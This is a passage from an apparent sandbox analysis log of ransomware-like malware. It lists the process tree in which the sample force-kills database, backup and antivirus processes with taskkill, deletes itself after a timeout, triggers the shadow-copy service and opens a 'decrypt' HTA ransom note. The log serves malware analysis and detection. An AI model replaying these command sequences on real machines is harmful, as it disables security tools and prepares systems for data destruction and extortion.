    3⤵
    - Kills process with taskkill
    PID:864
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM ZhuDongFangYu*
  2⤵
  PID:1836
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM ZhuDongFangYu*
    3⤵
    - Kills process with taskkill
    PID:1824
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM QBDBMgrN*
  2⤵
  PID:764
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBDBMgrN*
    3⤵
    - Kills process with taskkill
    PID:704
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM mysqld*
  2⤵
  PID:1636
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM mysqld*
    3⤵
    - Kills process with taskkill
    PID:1212
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM AutodeskDesktopApp*
  2⤵
  PID:1632
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM AutodeskDesktopApp*
    3⤵
    - Kills process with taskkill
    PID:1640
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM acwebbrowser*
  2⤵
  PID:1932
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM acwebbrowser*
    3⤵
    PID:1884
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Creative Cloud*
  2⤵
  PID:1948
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Creative Cloud*
    3⤵
    - Kills process with taskkill
    PID:1976
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Adobe Desktop Service*
  2⤵
  PID:1572
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Adobe Desktop Service*
    3⤵
    PID:1984
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM CoreSync*
  2⤵
  PID:1936
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM CoreSync*
    3⤵
    - Kills process with taskkill
    PID:1768
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Adobe CEF Helper*
  2⤵
  PID:1124
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Adobe CEF Helper*
    3⤵
    - Kills process with taskkill
    PID:232
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM node*
  2⤵
  PID:1400
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM node*
    3⤵
    - Kills process with taskkill
    PID:1828
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM AdobeIPCBroker*
  2⤵
  PID:212
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM AdobeIPCBroker*
    3⤵
    - Kills process with taskkill
    PID:1328
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sync-taskbar*
  2⤵
  PID:1604
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sync-taskbar*
    3⤵
    - Kills process with taskkill
    PID:904
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sync-worker*
  2⤵
  PID:340
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sync-worker*
    3⤵
    PID:824
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM InputPersonalization*
  2⤵
  PID:764
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM InputPersonalization*
    3⤵
    - Kills process with taskkill
    PID:1600
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM AdobeCollabSync*
  2⤵
  PID:1636
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM AdobeCollabSync*
    3⤵
    - Kills process with taskkill
    PID:1968
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM BrCtrlCntr*
  2⤵
  PID:1632
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM BrCtrlCntr*
    3⤵
    - Kills process with taskkill
    PID:1092
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM BrCcUxSys*
  2⤵
  PID:1932
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM BrCcUxSys*
    3⤵
    - Kills process with taskkill
    PID:1492
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SimplyConnectionManager*
  2⤵
  PID:2024
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SimplyConnectionManager*
    3⤵
    PID:2020
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Simply.SystemTrayIcon*
  2⤵
  PID:1156
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Simply.SystemTrayIcon*
    3⤵
    PID:1936
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM fbguard*
  2⤵
  PID:236
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM fbguard*
    3⤵
    PID:1736
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM fbserver*
  2⤵
  PID:480
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM fbserver*
    3⤵
    - Kills process with taskkill
    PID:1016
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM ONENOTEM*
  2⤵
  PID:208
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM ONENOTEM*
    3⤵
    - Kills process with taskkill
    PID:1032
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM wrapper*
  2⤵
  PID:1000
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM wrapper*
    3⤵
    PID:1560
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM DefWatch*
  2⤵
  PID:1864
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM DefWatch*
    3⤵
    - Kills process with taskkill
    PID:1908
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM ccEvtMgr*
  2⤵
  PID:1628
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM ccEvtMgr*
    3⤵
    - Kills process with taskkill
    PID:1956
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM ccSetMgr*
  2⤵
  PID:1972
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM ccSetMgr*
    3⤵
    - Kills process with taskkill
    PID:1256
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SavRoam*
  2⤵
  PID:1140
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SavRoam*
    3⤵
    PID:1976
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Sqlservr*
  2⤵
  PID:1492
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Sqlservr*
    3⤵
    PID:1476
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sqlagent*
  2⤵
  PID:2020
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqlagent*
    3⤵
    - Kills process with taskkill
    PID:1160
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sqladhlp*
  2⤵
  PID:1936
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqladhlp*
    3⤵
    - Kills process with taskkill
    PID:1608
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Culserver*
  2⤵
  PID:1736
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Culserver*
    3⤵
    - Kills process with taskkill
    PID:204
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM RTVscan*
  2⤵
  PID:1016
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM RTVscan*
    3⤵
    - Kills process with taskkill
    PID:220
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sqlbrowser*
  2⤵
  PID:1032
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqlbrowser*
    3⤵
    - Kills process with taskkill
    PID:1840
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SQLADHLP*
  2⤵
  PID:1560
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLADHLP*
    3⤵
    - Kills process with taskkill
    PID:1740
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM QBIDPService*
  2⤵
  PID:1908
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBIDPService*
    3⤵
    - Kills process with taskkill
    PID:1076
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*
  2⤵
  PID:1956
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Intuit.QuickBooks.FCS*
    3⤵
    - Kills process with taskkill
    PID:1580
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM QBCFMonitorService*
  2⤵
  PID:1256
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBCFMonitorService*
    3⤵
    PID:1584
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sqlwriter*
  2⤵
  PID:1976
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqlwriter*
    3⤵
    PID:1928
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM msmdsrv*
  2⤵
  PID:1476
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM msmdsrv*
    3⤵
    PID:1984
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM tomcat6*
  2⤵
  PID:1160
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM tomcat6*
    3⤵
    - Kills process with taskkill
    PID:1768
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM zhudongfangyu*
  2⤵
  PID:1608
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM zhudongfangyu*
    3⤵
    - Kills process with taskkill
    PID:236
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM vmware-usbarbitator64*
  2⤵
  PID:204
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM vmware-usbarbitator64*
    3⤵
    - Kills process with taskkill
    PID:480
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM vmware-converter*
  2⤵
  PID:220
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM vmware-converter*
    3⤵
    - Kills process with taskkill
    PID:216
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM dbsrv12*
  2⤵
  PID:1840
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM dbsrv12*
    3⤵
    PID:1484
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM dbeng8*
  2⤵
  PID:1740
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM dbeng8*
    3⤵
    - Kills process with taskkill
    PID:1792
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
  2⤵
  PID:1076
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    3⤵
    - Kills process with taskkill
    PID:572
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*
  2⤵
  PID:1580
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$VEEAMSQL2012*
    3⤵
    PID:1520
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
  2⤵
  PID:1584
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
    3⤵
    - Kills process with taskkill
    PID:1700
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SQLBrowser*
  2⤵
  PID:1928
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLBrowser*
    3⤵
    - Kills process with taskkill
    PID:1488
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SQLWriter*
  2⤵
  PID:1984
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLWriter*
    3⤵
    PID:1572
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM FishbowlMySQL*
  2⤵
  PID:1768
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM FishbowlMySQL*
    3⤵
    - Kills process with taskkill
    PID:1384
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
  2⤵
  PID:236
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    3⤵
    - Kills process with taskkill
    PID:1736
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MySQL57*
  2⤵
  PID:480
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MySQL57*
    3⤵
    - Kills process with taskkill
    PID:1016
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
  2⤵
  PID:216
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
    3⤵
    - Kills process with taskkill
    PID:1508
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLServerADHelper100*
  2⤵
  PID:1484
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQLServerADHelper100*
    3⤵
    - Kills process with taskkill
    PID:1796
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
  2⤵
  PID:1792
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
    3⤵
    PID:1908
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM msftesql-Exchange*
  2⤵
  PID:1628
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM msftesql-Exchange*
    3⤵
    - Kills process with taskkill
    PID:1868
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
  2⤵
  PID:320
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
    3⤵
    - Kills process with taskkill
    PID:1816
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*
  2⤵
  PID:1620
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$SBSMONITORING*
    3⤵
    - Kills process with taskkill
    PID:792
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*
  2⤵
  PID:1808
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$SHAREPOINT*
    3⤵
    - Kills process with taskkill
    PID:1776
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
  2⤵
  PID:864
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
    3⤵
    - Kills process with taskkill
    PID:784
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
  2⤵
  PID:1320
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
    3⤵
    PID:1824
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*
  2⤵
  PID:1556
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLAgent$SBSMONITORING*
    3⤵
    PID:1388
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*
  2⤵
  PID:1920
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLAgent$SHAREPOINT*
    3⤵
    PID:208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell [System.Net.Dns]::GetHostByAddress('10.7.0.166').hostname
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2024
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C timeout /T 15 /NOBREAK && del "C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe" /F
  2⤵
  - Deletes itself
  PID:632
- - C:\Windows\system32\timeout.exe
    timeout /T 15 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:832

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1052

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\Desktop\zcwiYr-decrypt.hta"
1⤵
- Modifies Internet Explorer settings
PID:1388